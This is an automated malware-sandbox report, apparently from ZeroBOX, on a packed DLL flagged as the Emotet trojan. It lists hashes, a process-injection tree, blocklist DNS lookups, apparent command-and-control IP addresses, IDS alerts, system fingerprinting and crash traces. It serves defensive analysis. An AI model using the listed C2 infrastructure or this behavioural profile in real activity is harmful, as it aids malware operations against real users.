Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Aug. 3, 2021, 7:43 a.m.	Aug. 3, 2021, 7:45 a.m.

Size	939.0KB
Type	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5	`4667f2ac85f21d40d87302b19415acef`
SHA256	`9744b85a140693e44849652f471ba7a53c213349f85e8055ae5e4233c75d1dad`
CRC32	`837B64EA`
ssdeep	`12288:jqaXVtfjXiMnRi5fRP0+yRSB0yYWAk+UI+nbVrSvIo5wm+t30lWF6QvNnIKckHR:jnbfj65fRUSGRZUI+nbBFdnIp4`
PDB Path	K:\MFC-Examples-main\MFC-Examples-main\MFCHTMLEdit-b2\bin\HTMLEdit.pdb
Yara	Malicious_Packer_Zero - Malicious Packer PE_Header_Zero - PE File Signature OS_Processor_Check_Zero - OS Processor Check IsDLL - (no description) UPX_Zero - UPX packed file IsPE32 - (no description) Malicious_Library_Zero - Malicious_Library Win32_Trojan_Emotet_1_Zero - Win32 Trojan Emotet Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet

rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\downloaddocument.do.dll,StartW
2648
- wermgr.exe C:\Windows\system32\wermgr.exe
  2888
  - svchost.exe C:\Windows\system32\svchost.exe
    2488
  - svchost.exe C:\Windows\system32\svchost.exe
    2656
  - svchost.exe C:\Windows\system32\svchost.exe
    844
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\downloaddocument.do.dll,
1160

Name	Response	Post-Analysis Lookup
150.134.208.175.b.barracudacentral.org		127.0.0.2
150.134.208.175.zen.spamhaus.org
www.myexternalip.com	A 34.117.59.81	34.117.59.81
150.134.208.175.cbl.abuseat.org

IP Address	Status	Action
105.27.205.34	Active	Moloch
164.124.101.2	Active	Moloch
182.253.210.130	Active	Moloch
184.74.99.214	Active	Moloch
185.56.175.122	Active	Moloch
194.146.249.137	Active	Moloch
216.166.148.187	Active	Moloch
34.117.59.81	Active	Moloch
46.99.175.217	Active	Moloch
5.152.175.57	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49204 -> 34.117.59.81:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49203 -> 216.166.148.187:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 192.168.56.101:49205 -> 216.166.148.187:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 192.168.56.101:49209 -> 46.99.175.217:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 192.168.56.101:49216 -> 185.56.175.122:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 192.168.56.101:49215 -> 185.56.175.122:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 185.56.175.122:443 -> 192.168.56.101:49216	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 46.99.175.217:443 -> 192.168.56.101:49209	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 216.166.148.187:443 -> 192.168.56.101:49205	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 216.166.148.187:443 -> 192.168.56.101:49203	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 185.56.175.122:443 -> 192.168.56.101:49215	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 192.168.56.101:49210 -> 46.99.175.217:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 46.99.175.217:443 -> 192.168.56.101:49210	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 192.168.56.101:49218 -> 182.253.210.130:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 182.253.210.130:443 -> 192.168.56.101:49218	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 192.168.56.101:49212 -> 105.27.205.34:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 105.27.205.34:443 -> 192.168.56.101:49212	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 192.168.56.101:49206 -> 5.152.175.57:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 5.152.175.57:443 -> 192.168.56.101:49206	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 192.168.56.101:49222 -> 184.74.99.214:443	2404309	ET CNC Feodo Tracker Reported CnC Server group 10	A Network Trojan was detected
TCP 192.168.56.101:49222 -> 184.74.99.214:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 184.74.99.214:443 -> 192.168.56.101:49222	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic
TCP 192.168.56.101:49221 -> 184.74.99.214:443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 184.74.99.214:443 -> 192.168.56.101:49221	2011540	ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)	Not Suspicious Traffic

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49204 34.117.59.81:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1D4	CN=ipecho.net	dd:09:22:63:02:d0:5e:cc:a7:61:7f:a6:22:f0:ed:58:cd:5d:e8:03
TLSv1 192.168.56.101:49203 216.166.148.187:443	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	b5:21:a8:16:d5:97:b1:67:f6:60:a5:cb:20:27:76:ec:3c:9d:3b:02
TLSv1 192.168.56.101:49205 216.166.148.187:443	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	b5:21:a8:16:d5:97:b1:67:f6:60:a5:cb:20:27:76:ec:3c:9d:3b:02
TLSv1 192.168.56.101:49209 46.99.175.217:443	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	b5:21:a8:16:d5:97:b1:67:f6:60:a5:cb:20:27:76:ec:3c:9d:3b:02
TLSv1 192.168.56.101:49216 185.56.175.122:443	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	50:fd:fd:4e:2c:57:ea:f7:c9:cd:3f:61:4a:a2:40:01:1b:b8:df:02
TLSv1 192.168.56.101:49215 185.56.175.122:443	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	50:fd:fd:4e:2c:57:ea:f7:c9:cd:3f:61:4a:a2:40:01:1b:b8:df:02
TLSv1 192.168.56.101:49210 46.99.175.217:443	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	b5:21:a8:16:d5:97:b1:67:f6:60:a5:cb:20:27:76:ec:3c:9d:3b:02
TLSv1 192.168.56.101:49218 182.253.210.130:443	C=US, ST=IL, O=Internet Widgits Pty Ltd	C=US, ST=IL, O=Internet Widgits Pty Ltd	92:9c:54:61:4b:3c:f9:b4:92:51:95:d0:aa:d5:6b:b5:51:ab:1d:47
TLSv1 192.168.56.101:49212 105.27.205.34:443	C=US, ST=IL, L=Chicago, O=Internet Widgits Pty Ltd	C=US, ST=IL, L=Chicago, O=Internet Widgits Pty Ltd	30:21:9a:cd:06:f2:ba:20:f6:0b:3c:54:ec:08:35:d0:9d:4b:e8:50
TLSv1 192.168.56.101:49206 5.152.175.57:443	C=US, ST=IL, L=Chicago, O=Internet Widgits Pty Ltd	C=US, ST=IL, L=Chicago, O=Internet Widgits Pty Ltd	30:21:9a:cd:06:f2:ba:20:f6:0b:3c:54:ec:08:35:d0:9d:4b:e8:50
TLSv1 192.168.56.101:49222 184.74.99.214:443	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	b5:21:a8:16:d5:97:b1:67:f6:60:a5:cb:20:27:76:ec:3c:9d:3b:02
TLSv1 192.168.56.101:49221 184.74.99.214:443	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	C=AU, ST=Some-State, O=Internet Widgits Pty Ltd	b5:21:a8:16:d5:97:b1:67:f6:60:a5:cb:20:27:76:ec:3c:9d:3b:02

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Aug. 3, 2021, 7:36 a.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 3, 2021, 7:43 a.m.			0	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

K:\MFC-Examples-main\MFC-Examples-main\MFCHTMLEdit-b2\bin\HTMLEdit.pdb

One or more processes crashed (4 events)

Time & API	Arguments	Status
__exception__ Aug. 3, 2021, 7:36 a.m.	stacktrace: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd hook_in_monitor+0x45 lde-0x133 @ 0x744142ea New_kernel32_GetSystemTimeAsFileTime+0x1d New_kernel32_GetSystemWindowsDirectoryA-0x8d @ 0x7442bdb5 0x126313 0x11de08 0x6702d9 0x11de60 exception.instruction_r: 48 8b 01 4a 89 44 c6 78 4d 85 e4 74 08 4b 89 8c exception.symbol: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a exception.instruction: mov rax, qword ptr [rcx] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 105050 exception.address: 0x771d9a5a registers.r14: 0 registers.r15: 1173680 registers.rcx: 0 registers.rsi: 1170952 registers.r10: 0 registers.rbx: 853611304 registers.rsp: 1170944 registers.r11: 0 registers.r8: 5 registers.r9: 1951129344 registers.rdx: 2 registers.r12: 1994795888 registers.rbp: 0 registers.rdi: 1173672 registers.rax: 1 registers.r13: 1225912	1
__exception__ Aug. 3, 2021, 7:37 a.m.	stacktrace: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd hook_in_monitor+0x45 lde-0x133 @ 0x744142ea New_ntdll_NtAllocateVirtualMemory+0x34 New_ntdll_NtClose-0x162 @ 0x7442fc86 VirtualAllocExNuma+0x66 VirtualAllocEx-0x2a kernelbase+0x33096 @ 0x7fefd703096 VirtualAllocEx+0x16 WriteProcessMemory-0x1a kernelbase+0x330d6 @ 0x7fefd7030d6 VirtualAllocEx+0x11 VerLanguageNameW-0xf kernel32+0x4bbe1 @ 0x76e8bbe1 0x126bdd exception.instruction_r: 48 8b 01 4a 89 44 c6 78 4d 85 e4 74 08 4b 89 8c exception.symbol: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a exception.instruction: mov rax, qword ptr [rcx] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 105050 exception.address: 0x771d9a5a registers.r14: 853603392 registers.r15: 853528672 registers.rcx: 27 registers.rsi: 3 registers.r10: 0 registers.rbx: 2 registers.rsp: 1168904 registers.r11: -125 registers.r8: 3 registers.r9: 1951132416 registers.rdx: 3 registers.r12: 40 registers.rbp: 3 registers.rdi: 1169296 registers.rax: 4 registers.r13: 0	1
__exception__ Aug. 3, 2021, 7:37 a.m.	stacktrace: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd 